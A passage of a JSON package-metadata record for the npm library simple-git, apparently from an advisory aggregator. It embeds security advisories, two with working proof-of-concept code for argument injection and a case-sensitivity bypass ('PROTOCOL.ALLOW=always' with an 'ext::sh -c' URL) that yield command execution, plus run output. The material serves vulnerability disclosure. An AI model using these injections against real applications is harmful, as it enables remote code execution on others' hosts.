git.clone('./testrepo1', './testrepo2', [String.fromCharCode(i) + '-u', `sh -c \\\"touch ${TMP_DIR}1_${i}\\\"`]);\n        } catch {}\n    }\n    // 2. `-${~}u` Pattern\n    for (let i = 0; i \u003c ITER; i++) {\n        try {\n            await git.clone('./testrepo1', './testrepo2', ['-' + String.fromCharCode(i) + 'u', `sh -c \\\"touch ${TMP_DIR}2_${i}\\\"`]);\n        } catch {}\n    }\n    // 3. `-u${~}` Pattern\n    for (let i = 0; i \u003c ITER; i++) {\n        try {\n            await git.clone('./testrepo1', './testrepo2', ['-u' + String.fromCharCode(i), `sh -c \\\"touch ${TMP_DIR}3_${i}\\\"`]);\n        } catch {}\n    }\n}\n\nasync function main() {\n    cleanTmpDir();\n    await runTest();\n\n    const found = getPwnedFiles();\n    \n    console.log(found);\n}\n\nmain();\n```\n\n### PoC\n\nThe environment in which I succeeded is as follows. As long as the OS remains Linux, I suspect it will succeed reliably despite considerable variation in other factors.\n\n```\nWSL Docker\nnode: v22.19.0\ngit: git version 2.39.5\nsimple-git: 3.28.0\n```\n\n1.\n\nCreate any git repository inside the `testrepo1` folder. A very simple repository with a single commit and a single file is fine.\n\n2.\n\nRun the following:\n\n```js\nconst { simpleGit } = require('simple-git');\n\nasync function main() {\n    const git = await simpleGit({ unsafe: { allowUnsafePack: false } });\n    await git.clone('./testrepo1', './testrepo2', [`-vu sh -c \\\"touch /tmp/pwned\\\"`]);\n}\n\nmain();\n```\n\nThis PoC explicitly configures `allowUnsafePack` to `false`. Of course, the same vulnerability occurs even without this option. An error is the expected behavior.\n\n3.\n\nCheck `/tmp` to confirm that `pwned` has been created.\nIf it failed, try replacing `-vu` with a different option from the list.\n\n### Impact\n\nThis vulnerability is *likely* to affect all versions prior to and including 3.28.0. This is because it appears to be a continuation of the series of four vulnerabilities previously found in simple-git (CVE-2022-24433, CVE-2022-24066, CVE-2022-25912, CVE-2022-25860).","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-04-13T16:35:37.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287","https://github.com/steveukx/git-js/blob/789c13ebabcf18ebe0b3a0c88ebb4037dede42e3/simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts#L26","https://www.cve.org/CVERecord?id=CVE-2022-25860","https://nvd.nist.gov/vuln/detail/CVE-2026-28291","https://github.com/steveukx/git-js/commit/1effd8e5012a5da05a9776512fac3e39b11f2d2d","https://github.com/steveukx/git-js/releases/tag/simple-git%403.32.0","https://github.com/advisories/GHSA-jcxm-m3jx-f287"],"source_kind":"github","identifiers":["GHSA-jcxm-m3jx-f287","CVE-2026-28291"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-13T17:00:20.961Z","updated_at":"2026-05-26T09:01:17.516Z","epss_percentage":0.00156,"epss_percentile":0.3591,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qY3htLW0zangtZjI4N84ABVLG","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qY3htLW0zangtZjI4N84ABVLG","packages":[{"ecosystem":"npm","package_name":"simple-git","versions":[{"first_patched_version":"3.32.0","vulnerable_version_range":"\u003c 3.32.0"}],"purl":"pkg:npm/simple-git"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qY3htLW0zangtZjI4N84ABVLG/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1yMjc1LWZyNDMtcG03cc4ABTah","url":"https://github.com/advisories/GHSA-r275-fr43-pm7q","title":"simple-git has blockUnsafeOperationsPlugin bypass via case-insensitive protocol.allow config key enables RCE","description":"### Summary\n\nThe `blockUnsafeOperationsPlugin` in `simple-git` fails to block git protocol\noverride arguments when the config key is passed in uppercase or mixed case.\nAn attacker who controls arguments passed to git operations can enable the\n`ext::` protocol by passing `-c PROTOCOL.ALLOW=always`, which executes an\narbitrary OS command on the host machine.\n\n---\n\n### Details\n\nThe `preventProtocolOverride` function in\n`simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts` (line 24)\nchecks whether a `-c` argument configures `protocol.allow` using this regex:\n\n```ts\nif (!/^\\s*protocol(.[a-z]+)?.allow/.test(next)) {\n   return;\n}\n```\n\nThis regex is case-sensitive. Git treats config key names\ncase-insensitively — it normalises them to lowercase internally.\nAs a result, passing `PROTOCOL.ALLOW=always`, `Protocol.Allow=always`,\nor any mixed-case variant is not matched by the regex, the check\nreturns without throwing, and git is spawned with the unsafe argument.\n\n**Verification that git normalises the key:**\n\n```bash\n$ git -c PROTOCOL.ALLOW=always config --list | grep protocol\nprotocol.allow=always\n```\n\n**The fix is a single character — add the `/i` flag:**\n\n```ts\n// Before (vulnerable):\nif (!/^\\s*protocol(.[a-z]+)?.allow/.test(next)) {\n\n// After (fixed):\nif (!/^\\s*protocol(.[a-z]+)?.allow/i.test(next)) {\n```\n\n---\n\n## poc.js\n\n```js\n/**\n * Proof of Concept — simple-git preventProtocolOverride Case-Sensitivity Bypass\n *\n * CVE-2022-25912 was fixed in simple-git@3.15.0 by adding a regex check\n * that blocks `-c protocol.*.allow=always` from being passed to git commands.\n * The regex is case-sensitive. Git treats config key names case-insensitively.\n * Passing `-c PROTOCOL.ALLOW=always` bypasses the check entirely.\n *\n * Affected : simple-git \u003e= 3.15.0 (all versions with the fix applied)\n * Tested on: simple-git@3.32.2, Node.js v23.11.0, git 2.39.5\n * Reporter : CodeAnt AI Security Research (securityreseach@codeant.ai)\n */\n\nconst simpleGit = require('simple-git');\nconst fs = require('fs');\n\nconst SENTINEL = '/tmp/pwn-codeant';\n\n// Clean up from any previous run\ntry { fs.unlinkSync(SENTINEL); } catch (_) {}\n\nconst git = simpleGit();\n\n// ── Original CVE-2022-25912 vector — BLOCKED by the 2022 fix ────────────────\n// This is the exact PoC Snyk used to report CVE-2022-25912.\n// It is correctly blocked by preventProtocolOverride in block-unsafe-operations-plugin.ts.\ngit.clone('ext::sh -c touch% /tmp/pwn-original% \u003e\u00262', '/tmp/example-new-repo', [\n  '-c', 'protocol.ext.allow=always',   // lowercase — caught by regex\n]).catch((e) =\u003e {\n  console.log('ext:: executed:poc', fs.existsSync(SENTINEL) ? 'PWNED — ' + SENTINEL + ' created' : 'not created');\n  console.error(e);\n});\n\n// ── Bypass — PROTOCOL.ALLOW=always (uppercase) ──────────────────────────────\n// The fix regex /^\\s*protocol(.[a-z]+)?.allow/ is case-sensitive.\n// Git normalises config key names to lowercase internally.\n// Uppercase variant passes the check; git enables ext:: and executes the command.\ngit.clone('ext::sh -c touch% ' + SENTINEL + '% \u003e\u00262', '/tmp/example-new-repo-2', [\n  '-c', 'PROTOCOL.ALLOW=always',       // uppercase — NOT caught by regex\n]).catch((e) =\u003e {\n  console.log('ext:: executed:', fs.existsSync(SENTINEL) ? 'PWNED — ' + SENTINEL + ' created' : 'not created');\n  console.error(e);\n});\n\n// ── Real-world scenario ──────────────────────────────────────────────────────\n// An application cloning a legitimate repository with user-controlled customArgs.\n// Attacker supplies PROTOCOL.ALLOW=always alongside a malicious ext:: URL.\n// The application intends to clone https://github.com/CodeAnt-AI/codeant-quality-gates\n// but the injected argument enables ext:: and the real URL executes the command instead.\n//\n// Legitimate usage (what the app expects):\n//   simpleGit().clone('https://github.com/CodeAnt-AI/codeant-quality-gates',\n//                     '/tmp/codeant-quality-gates', userArgs)\n//\n// Attacker-controlled scenario (what actually runs when args are not sanitised):\nconst LEGITIMATE_URL = 'https://github.com/CodeAnt-AI/codeant-quality-gates';\nconst CLONE_DEST     = '/tmp/codeant-quality-gates';\nconst SENTINEL_RW    = '/tmp/pwn-realworld';\ntry { fs.unlinkSync(SENTINEL_RW); } catch (_) {}\n\nconst userArgs   = ['-c', 'PROTOCOL.ALLOW=always'];\nconst attackerURL = 'ext::sh -c touch% ' + SENTINEL_RW + '% \u003e\u00262';\n\nsimpleGit().clone(\n  attackerURL,   // should have been LEGITIMATE_URL\n  CLONE_DEST,\n  userArgs\n).catch(() =\u003e {\n  console.log('real-world scenario [target: ' + LEGITIMATE_URL + ']:',\n    fs.existsSync(SENTINEL_RW) ? 'PWNED — ' + SENTINEL_RW + ' created' : 'not created');\n});\n```\n\n---\n\n## Test Results\n\n### Vector 1 — Original CVE-2022-25912 (`protocol.ext.allow=always`, lowercase)\n\n**Result: BLOCKED ✅**\n\nThe original Snyk PoC payload using lowercase `protocol.ext.allow=always` is correctly intercepted by `preventProtocolOverride` before git is invoked. A `GitPluginError` is thrown immediately and the sentinel file is never created.\n\n**Output:**\n```\next:: executed:poc not created\nGitPluginError: Configuring protocol.allow is not permitted without enabling allowUnsafeExtProtocol\n    at preventProtocolOverride (.../simple-git/dist/cjs/index.js:1228:9)\n    at .../simple-git/dist/cjs/index.js:1266:40\n    at Array.forEach (\u003canonymous\u003e)\n    at Object.action (.../simple-git/dist/cjs/index.js:1264:12)\n    at PluginStore.exec (.../simple-git/dist/cjs/index.js:1489:29)\n    at GitExecutorChain.attemptRemoteTask (.../simple-git/dist/cjs/index.js:1881:36)\n    at GitExecutorChain.attemptTask (.../simple-git/dist/cjs/index.js:1865:88) {\n  task: {\n    commands: [\n      'clone',\n      '-c',\n      'protocol.ext.allow=always',\n      'ext::sh -c touch% /tmp/pwn-original% \u003e\u00262',\n      '/tmp/example-new-repo'\n    ],\n    format: 'utf-8',\n    parser: [Function: parser]\n  },\n  plugin: 'unsafe'\n}\n```\n\n---\n\n### Vector 2 — Uppercase bypass (`PROTOCOL.ALLOW=always`)\n\n**Result: BYPASSED ⚠️ — RCE confirmed**\n\nThe `preventProtocolOverride` regex `/^\\s*protocol(.[a-z]+)?.allow/` is case-sensitive. `PROTOCOL.ALLOW=always` (uppercase) passes the check without error. Git normalises config key names to lowercase internally, enabling the `ext::` protocol. The injected shell command executes before git errors on the missing repository stream.\n\n**Output:**\n```\next:: executed: PWNED — /tmp/pwn-codeant created\nGitError: Cloning into '/tmp/example-new-repo-2'...\nfatal: Could not read from remote repository.\n\nPlease make sure you have the correct access rights\nand the repository exists.\n\n    at Object.action (.../simple-git/dist/cjs/index.js:1440:25)\n    at PluginStore.exec (.../simple-git/dist/cjs/index.js:1489:29) {\n  task: {\n    commands: [\n      'clone',\n      '-c',\n      'PROTOCOL.ALLOW=always',\n      'ext::sh -c touch% /tmp/pwn-codeant% \u003e\u00262',\n      '/tmp/example-new-repo-2'\n    ],\n    format: 'utf-8',\n    parser: [Function: parser]\n  }\n}\n```\n\n`/tmp/pwn-codeant` was created by the git subprocess — command execution confirmed.\n\n---\n\n### Vector 3 — Real-world scenario (target: `https://github.com/CodeAnt-AI/codeant-quality-gates`)\n\n**Result: BYPASSED ⚠️ — RCE confirmed**\n\nAn application passes user-controlled `customArgs` to `simpleGit().clone()`. The attacker injects `PROTOCOL.ALLOW=always` and substitutes a malicious `ext::` URL in place of the intended repository URL. The plugin does not block the uppercase variant; git enables `ext::` and executes the payload before the application can detect the failure.\n\n**Output:**\n```\nreal-world scenario [target: https://github.com/CodeAnt-AI/codeant-quality-gates]: PWNED — /tmp/pwn-realworld created\n```\n\n`/tmp/pwn-realworld` was created — arbitrary command execution in a realistic application context confirmed.\n\n---\n\n## Summary\n\n| # | Vector | Payload | Sentinel file | Result |\n|---|--------|---------|---------------|--------|\n| 1 | CVE-2022-25912 original | `protocol.ext.allow=always` (lowercase) | not created | Blocked ✅ |\n| 2 | Case-sensitivity bypass | `PROTOCOL.ALLOW=always` (uppercase) | `/tmp/pwn-codeant` created | **RCE ⚠️** |\n| 3 | Real-world app scenario | `PROTOCOL.ALLOW=always` + attacker URL | `/tmp/pwn-realworld` created | **RCE ⚠️** |\n\nThe case-sensitive regex in `preventProtocolOverride` blocks `protocol.*.allow` but does not account for uppercase or mixed-case variants. Git accepts all variants identically due to case-insensitive config key normalisation, allowing full bypass of the protection in all versions of simple-git that carry the 2022 fix.\n\n`/tmp/pwned` is created by the git subprocess via the `ext::` protocol.\n\nAll of the following bypass the check:\n\n| Argument passed via `-c` | Regex matches? | Git honours it? |\n|--------------------------|:--------------:|:---------------:|\n| `protocol.allow=always`  | ✅ blocked     | ✅              |\n| `PROTOCOL.ALLOW=always`  | ❌ bypassed    | ✅              |\n| `Protocol.Allow=always`  | ❌ bypassed    | ✅              |\n| `PROTOCOL.allow=always`  | ❌ bypassed    | ✅              |\n| `protocol.ALLOW=always`  | ❌ bypassed    | ✅              |\n\n---\n\n### Impact\n\nAny application that passes user-controlled values into the `customArgs`\nparameter of `clone()`, `fetch()`, `pull()`, `push()` or similar `simple-git`\nmethods is vulnerable to arbitrary command execution on the host machine.\n\nThe `ext::` git protocol executes an arbitrary binary as a remote helper.\nWith `protocol.allow=always` enabled, an attacker can run any OS command\nas the process user — full read, write and execution access on the host.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-03-10T18:38:56.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/steveukx/git-js/commit/f7042088aa2dac59e3c49a84d7a2f4b26048a257","https://www.codeant.ai/security-research/security-research-simple-git-remote-code-execution-cve-2026-28292","https://github.com/steveukx/git-js/security/advisories/GHSA-r275-fr43-pm7q","https://nvd.nist.gov/vuln/detail/CVE-2026-28292","https://www.codeant.ai/security-research/simple-git-remote-code-execution-cve-2026-28292","https://github.com/advisories/GHSA-r275-fr43-pm7q"],"source_kind":"github","identifiers":["GHSA-r275-fr43-pm7q","CVE-2026-28292"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-10T19:00:07.653Z","updated_at":"2026-05-28T19:03:01.401Z","epss_percentage":0.00146,"epss_percentile":0.34556,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yMjc1LWZyNDMtcG03cc4ABTah","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1yMjc1LWZyNDMtcG03cc4ABTah","packages":[{"ecosystem":"npm","package_name":"simple-git","versions":[{"first_patched_version":"3.32.3","vulnerable_version_range":"\u003e= 3.15.0, \u003c 3.32.3"}],"purl":"pkg:npm/simple-git"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yMjc1LWZyNDMtcG03cc4ABTah/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05dzVqLTRtd3YtMndqOM4AAxNC","url":"https://github.com/advisories/GHSA-9w5j-4mwv-2wj8","title":"Remote code execution in simple-git","description":"Versions of the package simple-git before 3.16.0 are vulnerable to Remote Code Execution (RCE) via the clone(), pull(), push() and listRemote() methods, due to improper input sanitization. This vulnerability exists due to an incomplete fix of CVE-2022-25912.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2023-01-26T21:30:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-25860","https://github.com/steveukx/git-js/pull/881/commits/95459310e5b8f96e20bb77ef1a6559036b779e13","https://github.com/steveukx/git-js/commit/ec97a39ab60b89e870c5170121cd9c1603cc1951","https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-3177391","https://github.com/advisories/GHSA-9w5j-4mwv-2wj8"],"source_kind":"github","identifiers":["GHSA-9w5j-4mwv-2wj8","CVE-2022-25860"],"repository_url":"https://github.com/steveukx/git-js","blast_radius":0.0,"created_at":"2023-01-27T02:02:55.270Z","updated_at":"2026-06-03T23:09:00.084Z","epss_percentage":0.41738,"epss_percentile":0.97473,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05dzVqLTRtd3YtMndqOM4AAxNC","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05dzVqLTRtd3YtMndqOM4AAxNC","packages":[{"ecosystem":"npm","package_name":"simple-git","versions":[{"first_patched_version":"3.16.0","vulnerable_version_range":"\u003c 3.16.0"}],"purl":"pkg:npm/simple-git"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05dzVqLTRtd3YtMndqOM4AAxNC/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05cDk1LWZ4dmctcWdxMs4AAwKh","url":"https://github.com/advisories/GHSA-9p95-fxvg-qgq2","title":"simple-git vulnerable to Remote Code Execution when enabling the ext transport protocol","description":"The package simple-git before 3.15.0 is vulnerable to Remote Code Execution (RCE) when enabling the `ext` transport protocol, which makes it exploitable via `clone()` method. This vulnerability exists due to an incomplete fix of [CVE-2022-24066](https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-2434306).","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-12-06T06:30:17.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-25912","https://github.com/steveukx/git-js/commit/774648049eb3e628379e292ea172dccaba610504","https://github.com/steveukx/git-js/blob/main/docs/PLUGIN-UNSAFE-ACTIONS.md%23overriding-allowed-protocols","https://github.com/steveukx/git-js/releases/tag/simple-git%403.15.0","https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3153532","https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-3112221","https://github.com/advisories/GHSA-9p95-fxvg-qgq2"],"source_kind":"github","identifiers":["GHSA-9p95-fxvg-qgq2","CVE-2022-25912"],"repository_url":"https://github.com/steveukx/git-js","blast_radius":0.0,"created_at":"2022-12-21T16:11:46.481Z","updated_at":"2026-05-28T19:12:23.347Z","epss_percentage":0.33677,"epss_percentile":0.9701,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05cDk1LWZ4dmctcWdxMs4AAwKh","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05cDk1LWZ4dmctcWdxMs4AAwKh","packages":[{"ecosystem":"npm","package_name":"simple-git","versions":[{"first_patched_version":"3.15.0","vulnerable_version_range":"\u003c 3.15.0"}],"purl":"pkg:npm/simple-git"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05cDk1LWZ4dmctcWdxMs4AAwKh/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yOHhyLW13eGctM3FjOM03tQ","url":"https://github.com/advisories/GHSA-28xr-mwxg-3qc8","title":"Command injection in simple-git","description":"`simple-git` (maintained as [git-js](https://github.com/steveukx/git-js) named repository on GitHub) is a light weight interface for running git commands in any node.js application.The package simple-git before 3.5.0 are vulnerable to Command Injection due to an incomplete fix of [CVE-2022-24433](https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-2421199) which only patches against the git fetch attack vector. A similar use of the --upload-pack feature of git is also supported for git clone, which the prior fix didn't cover. A fix was released in simple-git@3.5.0.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-04-02T00:00:13.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-24066","https://github.com/steveukx/git-js/commit/2040de601c894363050fef9f28af367b169a56c5","https://gist.github.com/lirantal/a930d902294b833514e821102316426b","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2434820","https://snyk.io/vuln/SNYK-JS-SIMPLEGIT-2434306","https://github.com/steveukx/git-js/releases/tag/simple-git%403.5.0","https://github.com/advisories/GHSA-28xr-mwxg-3qc8"],"source_kind":"github","identifiers":["GHSA-28xr-mwxg-3qc8","CVE-2022-24066"],"repository_url":"https://github.com/steveukx/git-js","blast_radius":0.0,"created_at":"2022-12-21T16:12:31.018Z","updated_at":"2026-04-23T10:07:38.864Z","epss_percentage":0.0302,"epss_percentile":0.86628,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yOHhyLW13eGctM3FjOM03tQ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yOHhyLW13eGctM3FjOM03tQ","packages":[{"ecosystem":"npm","package_name":"simple-git","versions":[{"first_patched_version":"3.5.0","vulnerable_version_range":"\u003c 3.5.0"}],"purl":"pkg:npm/simple-git"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yOHhyLW13eGctM3FjOM03tQ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zZjk1LXI0NHYtOG1yZ80ySg","url":"https://github.com/advisories/GHSA-3f95-r44v-8mrg","title":"Command injection in simple-git","description":"The package simple-git before 3.3.0 is vulnerable to Command Injection via argument injection. When calling the .fetch(remote, branch, handlerFn) function, both the remote and branch parameters are passed to the git fetch subcommand. By injecting some git options, it was possible to get arbitrary command execution.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-03-12T00:00:33.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-24433","https://github.com/steveukx/git-js/pull/767","https://github.com/steveukx/git-js/releases/tag/simple-git%403.3.0","https://snyk.io/vuln/SNYK-JS-SIMPLEGIT-2421199","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2421245","https://github.com/advisories/GHSA-3f95-r44v-8mrg"],"source_kind":"github","identifiers":["GHSA-3f95-r44v-8mrg","CVE-2022-24433"],"repository_url":"https://github.com/steveukx/git-js","blast_radius":0.0,"created_at":"2022-12-21T16:12:33.425Z","updated_at":"2026-04-28T20:09:42.589Z","epss_percentage":0.00927,"epss_percentile":0.75508,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zZjk1LXI0NHYtOG1yZ80ySg","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zZjk1LXI0NHYtOG1yZ80ySg","packages":[{"ecosystem":"npm","package_name":"simple-git","versions":[{"first_patched_version":"3.3.0","vulnerable_version_range":"\u003c 3.3.0"}],"purl":"pkg:npm/simple-git"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zZjk1LXI0NHYtOG1yZ80ySg/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/simple-git","docker_dependents_count":819,"docker_downloads_count":513026192,"usage_url":"https://repos.ecosyste.ms/usage/npm/simple-git","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/simple-git/dependencies","status":null,"funding_links":["https://github.com/steveukx/git-js?sponsor=1","https://github.com/sponsors/steveukx"],"critical":false,"issue_metadata":{"last_synced_at":"2026-05-15T13:12:55.246Z","issues_count":121,"pull_requests_count":213,"avg_time_to_close_issue":9487924.51764706,"avg_time_to_close_pull_request":2011491.683908046,"issues_closed_count":85,"pull_requests_closed_count":174,"pull_request_authors_count":20,"issue_authors_count":111,"avg_comments_per_issue":1.8016528925619835,"avg_comments_per_pull_request":0.8403755868544601,"merged_pull_requests_count":136,"bot_issues_count":0,"bot_pull_requests_count":80,"past_year_issues_count":11,"past_year_pull_requests_count":65,"past_year_avg_time_to_close_issue":2118191.6666666665,"past_year_avg_time_to_close_pull_request":320026.7027027027,"past_year_issues_closed_count":6,"past_year_pull_requests_closed_count":37,"past_year_pull_request_authors_count":7,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":0.9090909090909091,"past_year_avg_comments_per_pull_request":0.6461538461538462,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":30,"past_year_merged_pull_requests_count":33,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/issues","maintainers":[{"login":"steveukx","count":113,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/steveukx"}],"active_maintainers":[{"login":"steveukx","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/steveukx"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/simple-git/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/simple-git/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/simple-git/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/simple-git/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/simple-git/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/simple-git/codemeta","maintainers":[{"uuid":"steveukx","login":"steveukx","name":null,"email":"steve@mydev.co","url":null,"packages_count":52,"html_url":"https://www.npmjs.com/~steveukx","role":null,"created_at":"2022-11-10T11:51:42.961Z","updated_at":"2022-11-10T11:51:42.961Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/steveukx/packages"},{"uuid":"simple-git","login":"simple-git","name":null,"email":"simple-git@mydev.co","url":null,"packages_count":3,"html_url":"https://www.npmjs.com/~simple-git","role":null,"created_at":"2022-11-10T11:51:42.964Z","updated_at":"2022-11-10T11:51:42.964Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/simple-git/packages"}]}